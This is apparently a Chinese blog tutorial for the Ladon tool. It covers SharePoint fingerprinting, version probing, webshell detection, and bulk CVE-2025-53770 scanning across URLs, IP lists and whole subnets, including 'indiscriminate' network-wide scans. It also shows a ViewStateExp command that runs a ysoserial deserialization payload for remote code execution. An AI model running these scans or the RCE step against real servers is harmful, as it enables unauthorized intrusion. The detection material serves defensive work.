Ladon SharePoint CVE-2025-53770漏洞后门批量检测
本文于 323 天之前发表
CMS识别 SharePoint
CMS、WhatCMS、CmsInfo等,Cobalt Strike下用法一致,输入URL,仅识别URL对应指纹,输入非URL时,会探测常见cve-2025-53770网站、网络设备、打印机、路由器、防火墙、VPN等
1 | Ladon http://k8gege.org CMS |
SharePoint 版本探测
1 | Ladon http://k8gege.org SharePointVer |
结果如下
1 | Load SharePointVer |

SharePoint CVE-2025-53770后门检测
根据公开资料,对SharePoint服务器进行扫描,还是能检到一此webshell

访问 可获取 ValidationKey

CVE-2025-49704漏洞getshell
ysoserial 生成反序列化payload 使用Ladon ViewStateExp执行RCE

1 | Ladon ViewStateExp http://k8gege.org/_layouts/15/default.aspx payload.txt |
CVE-2025-53770 漏洞检测
指定URL
1 | Ladon http://k8gege.org cve-2025-53770 |

指定IP
1 | Ladon k8gege.org cve-2025-53770 |
批量URL
1 | Ladon url.txt cve-2025-53770 |
PS:TXT可存放IP、IP:Port、URL等格式
批量IP
1 | Ladon ip.txt cve-2025-53770 |
指定C段
1 | Ladon k8gege.org/24 cve-2025-53770 |
指定B段
1 | Ladon k8gege.org/b cve-2025-53770 |
指定A段
1 | Ladon k8gege.org/a cve-2025-53770 |
批量C段
1 | Ladon ip24.txt cve-2025-53770 |
PS: TXT存放多个目标的C段IP
批量B段
1 | Ladon ip16.txt cve-2025-53770 |
PS: TXT存放多个目标的B段IP
批量网段
1 | Ladon cidr.txt cve-2025-53770 |
PS: TXT存放各种IP网段,全网无差别扫描
更多功能 使用教程
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org
扫码加入K8小密圈